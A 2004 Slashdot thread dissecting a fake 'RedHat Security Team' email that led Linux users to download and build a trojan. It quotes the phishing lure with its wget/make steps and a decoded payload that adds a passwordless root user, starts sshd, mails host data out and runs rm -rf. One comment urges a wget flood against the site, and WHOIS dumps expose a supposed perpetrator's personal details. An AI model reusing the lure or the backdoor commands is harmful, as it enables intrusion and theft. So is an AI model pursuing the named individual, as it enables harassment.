Beware 'Fedora-Redhat' Fake Security Alert 628
rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.
text of site (Score:5, Informative)
Last revised: October 20, 2004
Source: RedHat
A complete revision history is at the end of this file.
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
* First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.g
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
*
Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
Re: text (Score:5, Insightful)
Re: text (Why? Because.) (Score:5, Insightful)
Because sending loads of traffic to a site that is actively trying to get a trojan onto unsuspecting boxes seems like a pretty bad idea.
Apart from those that might click through without bothering to RTFA, and mistakenly think that it's a legit patch, there are also all those browser exploits (such as the Microsoft jpeg exploit) that could also be waiting on the site for unpatched systems.
Re: text (Why? Because.) (Score:5, Insightful)
Though it's a shitty thing for someone to be doing, as it is anytime somebody tries to get a virus or exploit going, it is at the same time a very amusing example of one. Think about it, the concept of this one has a certain beauty: It is meant to be activated while the machine is under the control of someone who should know better. There is no clueless-luser-carelessly-clicking that can be done here, you've got to know some basic geek stuff to go get the 'patch', unpack it, install it.. You've got to expend a reasonable amount of effort to get nailed by this thing. That is both its curse and its beauty.
Re: text (Why? Because.) (Score:5, Funny)
Re: text (Why? Because.) (Score:5, Funny)
Thank you.
Christ, they didn't do a very good job... (Score:5, Insightful)
Re:Christ, they didn't do a very good job... (Score:5, Funny)
Thus we would like to thank you for your generous time in helping this valuable project reach its full potential.
You may also like to take note of our web site www.bugzilla-Fedora-Redhat.com, where we have set up a forum dedicated to improving our product.
Re:Christ, they didn't do a very good job... (Score:3, Funny)
Re:Christ, they didn't do a very good job... (Score:3, Insightful)
Re:Christ, they didn't do a very good job... (Score:4, Informative)
Uhm...you are massively confused. The whole point of Fedora Legacy is to provide such updates.
Re:Christ, they didn't do a very good job... (Score:4, Funny)
We do?
Re:text of site (Score:5, Funny)
Re:text of site (Score:4, Interesting)
Beyond those obvious problems, the "best" targets of something like this (businesses) would have people who know better than this. Those people would know how a patch file would work. At miniumum the "./inst" section should say "make install", which is much more common. So this would only effect the "newbie" Linux user. Last of all, I would expect that anything RedHat issued would say something like "or get the update through Red Carpet (or whatever their 'Windows Update' is called)".
This isn't a very well made forgery. They could have easily taken a true RedHat advisory and modified it so the language would be better and sound more plausable. They could have at LEAST gotten someone who knows English better.
Does anyone else find it strange someone would go through all the trouble of registering a domain-name to run this scam? Why not say "download it off the (such and such) mirror at ftp://120.584.391.568/pub/mirror/redhat/patches/pa tch_file.tar.gz" or something like that. Use any domain name and make it look like a mirror. When was the last time any company put a file for users at "(domainname).com/file.tar.gz"? Never.
Most people could have done better, IMHO.
Re:text of site (Score:5, Informative)
Also, a simple thing such as that this time you're not recommended to simply start up2date or yum to get updates as usual really should set off some alarms in people's minds. And that fedora-redhat.com is not and has never been used by Fedora or Red Hat. And so on.
I doubt that many fell for this.
Re:text of site (Score:5, Informative)
And there is more, but hey....
We knew this day would come (Score:4, Insightful)
Re:We knew this day would come (Score:5, Funny)
Re:We knew this day would come (Score:5, Interesting)
Allowing only registered executables to run could be set up to prevent such things. Microsoft signs their patches and programs too, but no regular user will ever check.
Incorporate such functions in the OS or GUI. Harass the user whenever an executable or shared library is introduced to the system: "Here are the certifications, do you trust this?"
Limiting permissions up to the user level is not enough anymore: VM based environments such as Java and
First time I saw a similar feature was in Kerio Personal Firewall, which would ask everytime a new program would attempt to connect somewhere, or have something connect to a port it opened. It was simple and effective, and the 'harassment' was more than worth it (SP2 does something similar, but it's flawed*).
In conclusion. I want to say that I believe if all people had:
1) Startup Monitor [mlin.net] - Painfully simple, no one should be without it.
2) Kerio Personal Firewall [kerio.com], or equivalent
3) An executable monitor as described above.
* SP2 tells you when an executable tries to connect, and waits for you to decide if you want to block it, but it *does* allow the connection to work until you decide what to do with it. Furthermore, I'm not sure if it can tell if an executable was replaced with a compromised version (Kerio has MD5 hashes)
Re:We knew this day would come (Score:3, Insightful)
> if all people had:
>
> 1) Startup Monitor - Painfully simple, no one
> should be without it.
I use startup monitor. It is good. The problem is that the vast majority of Windows users are so habitualised into clicking 'YES' all the time that nasties will often get installed anyway.
Malware: Do you want to install this nasty browser hijacker?
n00b: Yes, just give me my goddamn "tropical aquarium" screensaver already!
> 2) Kerio Personal Firewall, o
Re:We knew this day would come (Score:5, Interesting)
And allowing only registered executables to run is a bad thing. Who should decide?
On my computer, I should decide, and the registration dealie should provide me with the information I need to make the decision.
The two parts of Microsoft's weird DRM thing I disagree with (with regards to running executables) are that the key is inaccessible to me, stashed somewhere in the BIOS, and that Microsoft is the one who decides what is safe and what isn't.
Re:We knew this day would come (Score:4, Insightful)
Here is where the real danger lies, getting Linux on the desktop and having your grandma fall for this type of tripe, it will give *nix a bad name. "Oh no, Linux is just as vulnerable as Windows" No - its the users that are vulnerable, and the users that need to be educated. We all do what we can to lock down our boxen, but in the end it too often comes down to what's between the chair and the keyboard.
Re: (Score:3, Interesting)
About Time (Score:4, Insightful)
Re:About Time (Score:3, Informative)
hasn't happened on my SGI yet.
I'll try it... (Score:5, Interesting)
Stay tuned.
Re:I'll try it... (Score:5, Informative)
Re: I'll try it... Execution results! (Score:5, Informative)
adduser: No more than two names.
passwd: Unknown user bash
Could not load host key:
Could not load host key:
Could not load host key:
Disabling protocol version 1. Could not load host key.
Disabling protocol version 2. Could not load host key.
sshd: no hostkeys available -- exiting.
System looks OK. Proceeding to next step.
Patching "ls": ###########
Patching "mkdir": ##########
System updated and secured successfully. You may erase these files.
Re: I'll try it... Execution results! (Score:5, Informative)
Re: I'll try it... Execution results! (Score:5, Informative)
Dogg
Re: I'll try it... Execution results! (Score:3, Funny)
Re: I'll try it... Execution results! (Score:4, Interesting)
From shc's manpage:
Definitly doing something then, at least viewing the parent post.
Re: I'll try it... Execution results! (Score:5, Informative)
echo "Inca un root frate belea: " >>
adduser -g 0 -u 0 -o bash >>
passwd -d bash >>
ifconfig >>
uname -a >>
uptime >>
sshd >>
echo "user bash stii tu" >>
cat
rm -rf
(I'd post the whole script but the lameness filter won't let me)
Create a user named bash, no password
grab the ip and uptime, start ssh
mail the results
Re: I'll try it... Execution results! (Score:5, Interesting)
Re: I'll try it... Execution results! (Score:5, Funny)
If you do, make sure the IP addresses are of
Re: I'll try it... Execution results! (Score:3, Funny)
Try:
These are more than good enough.
Re: I'll try it... Execution results! (Score:3, Insightful)
Not if you run your own mail server(s).
As a test of why this is a BAD IDEA, send a message from your servers to an outside account. Read the full headers. Notice helpful little things there including IP addresses?
(Yes, you can send the message through your own servers to another account...though it might make reading the headers even more confusing if you've never do
Re: I'll try it... Execution results! (Score:4, Informative)
Been there, done that:
<root@addlebrain.com>: host sitemail.everyone.net[216.200.145.51] said: 554
Recipient Rejected: Not accepting mail for this account : Account
terminated due to violation of user agreement
link to a translation (Score:3, Informative)
Contents of inst.c... (Score:5, Informative)
View inst.c [gee-enginuity.com]
Re:Contents of inst.c... (Score:5, Funny)
Hey, stop trying to deny my GPL rights you Windows-loving tyrant!
Re:I'll try it... (Score:5, Informative)
There are 3 files:
fileutils-patch.bin
inst.c
Makefile
fileutils-patch.bin is an rpm with an incorrect extension, but it's valid. And an actual RPM from redhat (verified the GPG signature) Probably just put there to make it look bigger, and have something that came from redhat.
Well I was gonna put the package header information here, but slashcode didn't like it.
Signature verification using "rpm --checksig fileutils-patch.bin"
Re:I'll try it... (Score:5, Informative)
The working bit of the script is:
echo "Inca un root frate belea: " >>
adduser -g 0 -u 0 -o bash >>
passwd -d bash >>
ifconfig >>
uname -a >>
uptime >>
sshd >>
echo "user bash stii tu" >>
cat
rm -rf
So, adds a user called bash with root privs, starts sshd and emails your IP address to someone.
Re:I'll try it... (Score:5, Informative)
Registration Service Provided By: StoreIQ, Inc.
Contact: technical@storeiq.com
Visit:
Domain name: addlebrain.com
Registrant Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US
Administrative Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US
Technical Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US
Billing Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US
Status: Locked
Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com
The same address is used for two associated domains, buywirelessdirect.com (the email addy for this domain's tech contact) and storeiq.com (the email addy for buywirelessdirect.com's tech contact). The area code is accurate for that neck of the woods too, though I haven't tried the phone number (yet):
StoreIQ, Inc.
John Thompson (technical@storeiq.com)
+1.7323331145
Fax:
3587 US Highway 9 #213
Freehold, NJ 07728
US
Re:I'll try it... (Score:3, Informative)
Re:I'll try it... (Score:3, Informative)
-translation: one more "root" brother trouble
echo "user bash stii tu" >>
-translation:
cat
-translation: one more wheel (roata -- root... it sounds alike)
It doesn't say anything meaningful, the guy is an idiot.
I love it! (Score:5, Funny)
(Mind you, I'm no better. First time I got a computer virus, when I was running MSDOS, my first reaction was to run a binary diff against a clean version of the file, and disassemble the result to see what it did. Do you know if there's a cure for this?)
Re:I love it! (Score:3, Insightful)
A cure for what? Human curiosity? Why on Earth would anyone want to be "cured" from that, and become something less instead. It's one of the few good qualities that have brought us so far despite our lacking on other important areas...
On computer geeks, need to know how things work naturally becomes directed towards computers...
Re:I love it! (Score:4, Insightful)
You don't want a cure for this.
If you want a legitimate comparison between Linux and Windows security, observe:
This is new and fresh enough to "set up a sandbox environment and run it, to see what happens!" Another Windows similar thingee, "been there done that".
Dated 23rd October 2004 on http://www.redhat.com/security/ which means that Red Hat was on top of it fast. This isn't the kind of thing that Slashdot sits on and Red Hat was one day plus ahead. For comparison, it took about 6 days for Microsoft to return anything about Code Red on a search from microsoft.com. That's 6 days after appearing on Slachdot (compared to 1 day before).
Re:I love it! (Score:3, Funny)
Re:I'll try it... (Score:4, Informative)
The makefile compiles an application called inst that seems to have been created with the shc script compiler.. its rather obfuscated.. attempting to reverse engineer now
Re:I'll try it... (Score:3, Informative)
I'm retarded (Score:4, Informative)
Re:I'm retarded (Score:5, Informative)
wont work (Score:3, Insightful)
Here's what WHOIS says: (Score:5, Informative)
[Redirected to whois.melbourneit.com]
[Querying whois.melbourneit.com]
[whois.melbourneit.com]
Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES
Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............
Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com
Re:Here's what WHOIS says: (Score:3, Informative)
Re:Here's what WHOIS says: (Score:3, Informative)
Whois on domains are easily faked (Score:3, Informative)
However, the IP block clearly belongs to Yahoo, whois 66.218.75.0 lists contact point netblockadmin@yahoo-inc.com [mailto]
Anybody feel like dropping them a line to tell them they're hosting trojaners?
Re:Here's what WHOIS says: (Score:3, Informative)
Found a referral to whois.enom.com.
Registration Service Provided By: StoreIQ, Inc.
Contact: technical@storeiq.com
Visit:
Domain name: addlebrain.com
Registrant Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US
Administrative Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323
Re:Here's what WHOIS says: (Score:5, Funny)
Sorry to dissapoint you, but I doubt he owns the domain - they offer free webmail, so it's likely he just signed up for an account. Presumably they didn't stop anyone from getting the username 'root' - I signed up for 'administrator' just now (password 'monkey' if you don't believe me) with no problems.
Re:Here's what WHOIS says: (Score:3, Insightful)
Real link? (Score:5, Insightful)
Re:Real link? (Score:4, Informative)
Re:Real link? (Score:3, Interesting)
I'm running the following script on my box, and I recommend others to do the same.
while true; do wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.g
If enough people do the same, either the site is taken offline, or we're gonna cost him a pretty penny.
Re:Real link? (Score:4, Funny)
Oops.
--Re:two good reasons (Score:4, Informative)
Security only works when you know what to check (Score:4, Insightful)
However, what good is that against Joe User who falls for the bait and things the e-mail is authentic because they believe everything they read on their screen? They don't know to check for the "security seals" and since they don't see any red flags indicating that this is bogus.
It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absense of those marks is not alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.
Stupid Tricks? (Score:5, Interesting)
Re:Stupid Tricks? (Score:5, Funny)
No monitor.
Surprisingly (Score:5, Funny)
Everyone checks the gpg signatures right?
Use the /. effect for good (Score:4, Funny)
Confidence (Score:3, Insightful)
But imagine a world where Linux overwhelms Microsoft as the #1 desktop OS. Millions of Moms and Pops everywhere, using Linux. Who will they trust for their "updates"? I know for sure lots of them would fall for this particular trick, and it`s one of the first time we see this. Lots of distros, lots of sources, lots of patches, major confusion.
Question (as I don`t use Linux yet) : Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it`s essential for further desktop market share increase.
Re:Confidence (Score:3, Informative)
For the most part, they all do, even most of the little ones. Typing "yum -y update" at the command line keeps me up to date, or I could enable the cron job to do it automatically each night.
PHEW! (Score:5, Funny)
Linux - Where the malware comes with the source (Score:5, Funny)
Re:Linux - Where the malware comes with the source (Score:5, Funny)
Use SPF to protect yourself from phishing (Score:5, Informative)
If your mail client checked From: addresses against SPF records in DNS, you'd know immediately this was a hoax. Redhat.com fortunately publishes SPF records and -- score one for SPF -- they can be used to identify with 100% accuracy that the mail is not legitimate.
How can you get your mail client to check SPF records automatically? Download the Thunderbird SPF Extension [for.net].
(Disclosure: I wrote the plugin. :) )
Re:Use SPF to protect yourself from phishing (Score:4, Informative)
On another note, concerning your SPF plugin: I have two points you may wish to consider (if you already have, then fair enough).
1. The From address used by the plugin comes from the From: header in the message? I thought you're not supposed to do this with SPF; it specifies that you should check the SMTP envelope sender (the MAIL FROM line from the SMTP dialogue). This information is not available to a MUA in any standard form AFAIK.
2. What happens if I open a message I stored from a few months/years ago, and the SPF record for the domain it's from has changed? Does the plugin validate a message whenever one is opened, and will I end up with a false positive/negative?
I believe these two issues are why SPF checking must be performed on the server side. The mail server alone has reliable access to the SMTP envelope sender, and can add a Recieved-SPF header at the time of message reception, which is the only time when it is guaranteed that the SPF records from DNS are relevant to the message in question.
SPF done on the client side basically turns into MICROS~1's (patented, if you believe that they'll allow crap like this to be patented!) Sender-ID system, where the From address is taken from a seletion of message headers.
Of course, if I'm wrong about any of this, please correct me.
Re:Use SPF to protect yourself from phishing (Score:3, Informative)
The point is that you cannot tell. The From header in the email itself tells you nothing. It is forgery of the the SMTP envelope sender that SPF guards against.
Consider:
220 some mailserver... ready!
MAIL FROM: sneaky@fedora-redhat.com
250 OK
RCPT TO: some_innocent@hotmail.com
250 OK
DATA
354 you have a go
From: security@redhat.com
Subject: EMERGENCY SECURITY PATCH APPLY NOW!
Etc etc. The SPF check is performed
Re:Use SPF to protect yourself from phishing (Score:3, Insightful)
Re:Use SPF to protect yourself from phishing (Score:3, Funny)
Coding 0, Grammar 0. (Score:5, Funny)
But I am running SUSE! Am I adviced in similar fashion? Perhaps I too should applying patch lest SUSE found vulnerability also? Thankyou to www.fedora-redhat.com for adviced me in this helpful manner against remote attackers!
Looks to be a Klik client? (Score:3, Informative)
Everything but the comments at the top of the page, and the shellcode, is pretty-much identical.
Klik looks to be a "KDE-based Live Installer for Knoppix".
Still looking....
Red.
Re:Looks to be a Klik client? (Score:3, Informative)
http://www.datsi.fi.upm.es/~frosal/sour
Red.
Re:Looks to be a Klik client? (Score:3, Insightful)
It seems stupid to encode the shell script into an unreadable form and then to post the sources; a few small changes to the source and it happily prints out the shell script.
Stupidity (Score:3, Funny)
contact yahoo (Score:4, Informative)
Checksum (Score:4, Funny)
68349c219d941209af8f7c968b89d622 *fileutils-1.0.6.patch.tar.gz
So you can be sure you're getting the real fake patch.
Updated version from a couple of days ago... (Score:4, Interesting)
Whoever is behind this certainly seems to be doing a very sloppy job of it. Yahoo, Melbourne IT, Stanford, hosting at "everyone.net"; hardly a who's who of dodgy companies and "bullet proof" service providers, is it? Frankly, I'm expecting to be reading a Slashdot story about a bust by the end of the week, and that's being generous.
notifying the appropriate people.... (Score:3, Interesting)
abuse@above.net
Subject : malware using your netblock to propagate
http://it.slashdot.org/article.pl?sid =04/10/24/2352234&tid=172&tid=110&tid=218&tid=106
The story reports on a linux trojan that, after installing, emails a
report back to root@addlebrain.com. The MX record for addlebrain.com
points to sitemail.everyone.net. It would reduce the effect of this if
you could shut down that email account.
Better yet, you should gather the list of infected IPs and then inform
the owners.
Damian Menscher
--
-=#| Physics Grad Student & SysAdmin @ U Illinois Urbana-Champaign |#=-
-=#| 488 LLP, 1110 W. Green St, Urbana, IL 61801 Ofc:(217)333-0038 |#=-
-=#| 4602 Beckman, VMIL/MS, Imaging Technology Group:(217)244-3074 |#=-
-=#| <menscher@uiuc.edu> www.uiuc.edu/~menscher/ Fax:(217)333-9819 |#=-
-=#| The above opinions are not necessarily those of my employers. |#=-
From the WHOIS: (Score:3, Informative)
Raymond Jackson
224 Cedar Avenue
New York, NY 95301.
209 899-4533 However, 95301 is an Atwater, CA zip code.
So, I looked up Raymond Jackson in Atwater. What did I find?
Raymond Jackson
224 Cedar Avenue
Atwater, CA 95301
209 358 8510.
Looks like he did a crappy job of disguising his identity. Go get him!!!
Full decryption of the shell script (Score:4, Informative)
Re:I wonder... (Score:4, Funny)
Probabilities: (Score:5, Funny)
If the Antivirus companies were responsible, they'd have done a better job.
If Microsoft was responsible, they wouldn't have included any source code.
If SCO was responsible, they'd have included sourcecode and then sued you for running it
All things taken into consideration, I'm with 'other' on this one
Re:Finally... (Score:5, Funny)
It keeps the "Mandrake Crew" off of the debian-users lists.
Re:Trademark infringement... (Score:3, Funny)
Re:bastards (Score:5, Insightful)
dont bother wasting your time.... (Score:3, Informative)
fedora-redhat.com has address 66.218.79.149
fedora-redhat.com has address 66.218.79.155
fedora-redhat.com has address 66.218.79.147
fedora-redhat.com has address 66.218.79.148
whois 66.218.79.149
OrgName: Yahoo!
OrgID: YAOO
Address: 701 First Avenue
City: Sunnyvale
StateProv: CA
PostalCode: 94089
Country: US
NetRange: 66.218.64.0 - 66.218.95.255
CIDR: 66.218.64.0/19
Trying to ddos yahoo wont get you very far : )
Re:look at this in a diffrent way (Score:3, Funny)
"Attached is a sexy picture of Anna Kournikova.
To view the picture, simply:
1) save the attachment
2) su -
3) tar -xjf anna.tar.gz
4)
5) make
6) make install
7) anna"